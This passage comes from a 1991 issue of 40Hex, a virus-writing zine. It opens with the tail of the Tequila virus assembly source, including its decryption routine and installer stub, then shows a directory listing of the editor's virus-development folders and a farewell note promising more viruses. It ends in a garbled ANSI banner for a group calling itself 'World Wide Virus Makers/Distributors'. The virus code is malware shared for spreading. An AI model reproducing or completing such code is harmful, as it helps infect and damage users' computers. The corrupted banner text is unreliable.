JB 0A61 ;Masm Mod. Needed
MOV SI,0960
LOOP 0A52 ;Masm Mod. Needed
RET
THE_FILE_DECRYPTING_ROUTINE:
PUSH CS
POP DS
MOV BX,4
MOV SI,0964
MOV CX,0960
MOV DL,B[SI]
ADD B[BX],DL
INC SI
INC BX
CMP SI,09A4
JB 0A7E ;Masm Mod. Needed
MOV SI,0964
LOOP 0A6F ;Masm Mod. Needed
JMP 0390 ;Masm Mod. Needed
;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========
;========== BUT IS MERELY THE BOOSTER. ========
START:
LEA W[0104],EXIT ;Masm Mod. Needed
MOV W[0106],CS ;Masm Mod. Needed
MOV BX,CS
SUB W[0106],BX ;Masm Mod. Needed
JMP INSTALL
EXIT:
INT 020
TEQUILA ENDP
CODE_SEG ENDS
END TEQUILA
--------------------------------------------------------------------------------
40Hex Issue 4 December 1991
Left Blank
Cause its bad
luck
how about something real dumb like....
Directory of C:\TASM
. <DIR> 11-28-91 11:44a
.. <DIR> 11-28-91 11:44a
LAB <DIR> 12-10-91 8:45p
1605 ASM 38553 12-09-91 12:31p
911 ASM 19267 12-10-91 7:21p
911 SDF 7084 12-10-91 10:41p
BBRAINS ASM 8990 08-06-91 3:04p
BMONDAY ASM 21455 12-09-91 12:31p
BOBVIRUS ASM 21280 12-14-91 4:38p
BRU_TEST COM 11 12-16-91 1:52p
CANCER ASM 2600 02-09-91 12:38a
DARTH2 ASM 8938 12-09-91 11:50a
DEADPOOL ASM 5324 12-14-91 1:00a
DIR2SCAN ASM 892 12-22-91 1:17a
DIR2SCAN COM 112 12-22-91 1:17a
EMFII ASM 16755 12-08-91 10:55p
FILES DOC 2373 12-11-91 9:58a
FUNNY ASM 5807 12-18-91 12:46p
FUNNY COM 208 12-18-91 12:46p
GREP DOC 13619 03-13-91 2:02a
HAPPY ASM 5667 12-18-91 12:32p
HAPPY MAP 34 12-25-91 11:27a
HEADER 94 12-09-91 10:25a
JOKER ASM 16258 11-10-91 10:55p
KILL-FSP ASM 1475 11-12-91 4:28p
KILL-FSP COM 55 12-25-91 11:26a
KILL-FSP EXE 823 12-25-91 11:26a
KILL-FSP MAP 103 12-25-91 11:26a
KILL-FSP OBJ 195 12-25-91 11:26a
MAKE EXE 37056 03-13-91 2:02a
MANUAL DOC 52126 03-13-91 2:02a
MBIOS MAC 13380 03-13-91 2:02a
MG-1 ASM 4527 12-17-91 10:58a
MG-1 SDF 2319 12-17-91 10:58a
NAILME ASM 206 12-18-91 10:01p
NAILME COM 100 12-19-91 10:26a
OBJXREF DOC 18404 03-13-91 2:02a
PARITY ASM 5837 12-09-91 12:49p
PH-VIR1 TXT 22086 11-04-91 9:00p
PROLOG DOC 23811 03-13-91 2:02a
RAGE ASM 9335 11-29-91 12:17p
SR EXE 117543 10-30-89 8:00a
SURVEY DOC 4479 11-29-91 1:01p
TASM EXE 106521 03-13-91 2:02a
TASM TAH 167927 03-13-91 2:02a
TCREF DOC 4954 03-13-91 2:02a
TCREF EXE 7856 03-13-91 2:02a
TD EXE 409360 03-13-91 2:02a
TDCONFIG TD 1208 12-06-91 12:01p
TDCONVRT EXE 35366 03-13-91 2:02a
TDDEV EXE 8544 03-13-91 2:02a
TDHELP TDH 126541 03-13-91 2:02a
TDINST EXE 107638 03-13-91 2:02a
TDMAP EXE 16944 03-13-91 2:02a
TDMEM EXE 14256 12-24-91 8:19p
TDNMI COM 644 03-13-91 2:02a
TDPACK EXE 25520 03-13-91 2:02a
TDREMOTE EXE 20738 03-13-91 2:02a
TDRF EXE 17376 03-13-91 2:02a
TDSTRIP EXE 13868 03-13-91 2:02a
TDUMP EXE 70554 03-13-91 2:02a
THELP COM 9912 11-28-91 11:46a
THELP DOC 7619 03-13-91 2:02a
TINY ASM 4233 01-01-80 12:26a
TINY TXT 92 01-01-80 12:25a
TINYB ASM 4404 01-01-80 12:32a
TINYB TXT 89 01-01-80 12:31a
TINYC ASM 4669 01-01-80 12:14a
TINYC TXT 118 01-01-80 12:31a
TINYD ASM 5486 01-01-80 12:02a
TINYE ASM 6464 01-01-80 12:09a
TLIB EXE 35668 03-13-91 2:02a
TLINK DOC 3837 03-13-91 2:02a
TLINK EXE 53510 03-13-91 2:02a
TOUCH COM 5118 03-13-91 2:02a
UPDATE DOC 20266 03-13-91 2:02a
VIENNA ASM 26395 09-30-87 12:59a
VIOL-C ASM 19096 12-16-91 10:25p
VSAFE COM 32050 03-28-91 1:00p
VWATCH COM 12263 03-28-91 1:00p
WIN COM 19358 12-24-91 9:52p
WINFIX ASM 2603 12-21-91 8:18p
WINFIX COM 357 12-24-91 9:52p
WINFIX MAP 103 12-24-91 9:52p
WINFIX OBJ 553 12-24-91 9:52p
85 file(s) 1939259 bytes
Directory of C:\TASM\LAB
. <DIR> 12-10-91 8:45p
.. <DIR> 12-10-91 8:45p
LAB <DIR> 12-10-91 8:46p
AMAG0589 TXT 46529 05-21-89 7:06p
AMAG1289 TXT 113270 12-16-89 12:21p
BIT ASM 778 08-30-91 8:33p
BIT MAP 103 12-24-91 11:31p
BIT OBJ 192 12-24-91 11:31p
BUGOFF ASM 903 12-25-91 11:59a
BUGOFF COM 43 12-25-91 11:59a
BUGOFF MAP 103 12-25-91 11:59a
BUGOFF OBJ 198 12-25-91 11:59a
CRACK-W ASM 1430 12-24-91 7:49p
CRACK-W MAP 103 12-24-91 7:47p
DIR ASM 10274 12-25-91 12:46a
DIR MAP 99 12-25-91 12:48a
DIR OBJ 961 12-25-91 12:48a
DIR SDF 5032 12-25-91 12:46a
DL ASM 416 12-14-91 6:35p
DUMB DOC 52346 12-19-91 1:46p
ENW 3 12-19-91 6:02p
EXE_FILE ASM 80 12-24-91 12:36a
EXE_FILE EXE 516 12-24-91 12:36a
EXE_FILE MAP 220 12-24-91 12:36a
EXE_FILE OBJ 183 12-24-91 12:36a
FUCK_UP DOC 198 12-23-91 10:33a
FUNGUS ASM 17120 12-21-91 1:37p
FUNGUS SDF 4933 12-21-91 1:34p
HAP ASM 2440 12-16-91 12:42p
HAPPY ASM 7144 12-25-91 11:30a
HAPPY COM 248 12-25-91 11:28a
HAPPY MAP 99 12-25-91 11:28a
HAPPY OBJ 424 12-25-91 11:28a
HEADER 94 12-09-91 10:25a
KENNEDY ASM 6663 12-25-91 12:43a
KENNEDY SDF 2803 12-25-91 12:43a
KILL ASM 517 12-19-91 6:05p
MAR-INST BAT 205 08-31-91 12:13a
MAR-INST DOC 1037 08-31-91 12:20a
MARAUDER ASM 21997 12-23-91 10:21a
MARAUDER DOC 2305 12-20-91 9:40a
MAR_ASM! ZIP 5361 12-23-91 10:35a
MODES ASM 244 12-25-91 7:22p
MODES COM 7 12-25-91 7:22p
MODES MAP 99 12-25-91 7:22p
MODES OBJ 136 12-25-91 7:22p
NEW ASM 21997 12-23-91 10:21a
NEW COM 869 12-25-91 12:12a
NEW MAP 103 12-25-91 12:12a
NEW OBJ 1261 12-25-91 12:12a
NEW_KILL ASM 1318 12-23-91 10:29a
NEXT ASM 2208 12-25-91 12:41a
PS ANS 3218 11-25-91 9:43p
SECTOR ASM 1573 12-11-91 10:52p
SS DOC 270 08-08-91 3:00p
SS EXE 6898 08-08-91 3:00p
TARGET ASM 472 12-20-91 3:32p
TARGET COM 100 12-25-91 8:53p
TARGET MAP 103 12-25-91 8:53p
TARGET OBJ 261 12-25-91 8:53p
60 file(s) 348507 bytes
Directory of C:\TASM\LAB\LAB
. <DIR> 12-10-91 8:46p
.. <DIR> 12-10-91 8:46p
2 file(s) 0 bytes
Total files listed:
147 file(s) 2287766 bytes
1843200 bytes free
40Hex Issue 4 December 1991
Is This The End?
----------------
Well, to be honest. I'm kind of tired writing this magazine. It's
not like I hate it or anything, it's just too much pressure for one
person to handle. Decimator helped me out a bit with a few articals
and such. But still every time I do an issue it's me who does the
marjority of the work. It seems the magazine is bigger than I
thought. It seems to be on everybodys BBS from NY to California,
from Canada to Europe. The thing is I can't write this thing by
myself anymore. I work everyday from 2pm - 10pm and I will be going
back to school next semester. So I don't have time to handle all the
things I do. So in the long run the magazine suffers. Anyway,
unless people want to help out (mabey the reason is that I haven't
really asked before) lemme know. Contact me on Digital Warefare.
The numbers in an artical in this issue somewhere I'm sure. Anyway,
fuck it, If people don't contribute soon this may well be the last
issue of this rag ever. So whatever happens in 1992, we shall see.
So if this is it, later people. My viruses will still be coming on
strong as always...
Later
Hellraiser 12/26/91
HHHH
HHC
ÜÜÜÜÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜÜÜÜÜÜ
¥C
ÜÜ
¥
s
u
C
ÜÜÜÜÜÜ
¥C
ÜÜÜÜÜÜÜ
¥C
ÜÜÜÜ
¥C
ÜÜ
¥HC
ÜÜ
¥
₧
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥
s
u
₧₧
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥
₧₧₧₧
ÜÜ
¥
₧₧
ÜÜ
¥C
ÜÜ
ÜÜ
¥C
ÜÜ
¥HC
ÜÜ
¥C
ÜÜs
u
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥
₧
ÜÜs
u
¥C
ÜÜ
¥1HC
ÜÜÜÜÜÜ
¥C
ÜÜÜÜÜÜÜ
¥C
ÜÜÜÜÜÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜs
u
¥C
₧
ÜÜ
¥C
ÜÜ
¥1HC
ÜÜ
¥
₧₧₧₧
ÜÜ
¥
₧₧
ÜÜ
¥C
ÜÜ
¥
₧₧
ÜÜ
¥C
ÜÜ
¥C
ÜÜs
u
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
₧
ÜÜ
ÜÜ
¥1HC
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜs
u
¥C
ÜÜÜÜÜÜ
¥C
ÜÜÜÜÜÜ
¥C
ÜÜÜÜÜÜÜ
¥C
ÜÜ
¥C
₧
ÜÜÜÜ
¥1HC
₧₧₧C₧₧₧ ₧₧₧ ₧₧₧ ₧₧₧ ₧₧₧₧₧₧₧ ₧₧₧₧₧₧₧ ₧₧₧₧₧₧₧₧ ₧₧₧ ₧₧₧₧₧1H
ÜÜÜÜs
uÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜ
¥C
ÜÜÜÜÜÜ
¥C
ÜÜÜ
¥C
ÜÜÜ
¥C
World Wide Virus1H
ÜÜ
¥
₧₧₧₧
ÜÜs
u
¥C
ÜÜ
¥
₧
ÜÜ
¥C
ÜÜ
¥
₧₧₧₧
ÜÜ
Ü
Ü
ÜÜ
¥C
Makers/Distributors1H
ÜÜÜÜÜÜ
¥C
ÜÜÜÜ
¥
s
u
₧₧
ÜÜ
¥C
ÜÜÜÜÜÜ
¥C
ÜÜ
¥
₧
Ü
¥
₧
ÜÜ
¥1HC
₧₧₧₧
ÜÜ
¥C
ÜÜ
¥
₧
ÜÜ
¥C
ÜÜs
u
¥C
₧₧₧₧
ÜÜ
¥C
ÜÜ
¥C
₧₧
ÜÜ
¥1HC
ÜÜÜÜÜÜ
¥C
ÜÜ
¥C
₧
ÜÜ
¥C
ÜÜ
¥C
ÜÜÜÜÜÜ
¥
s
u
C
ÜÜ
¥C
ÜÜ
¥1HC
₧₧₧₧₧₧₧ ₧₧₧ ₧₧₧ ₧₧₧ ₧₧₧₧₧₧₧ ₧₧₧ ₧₧₧1H
1H1H1H
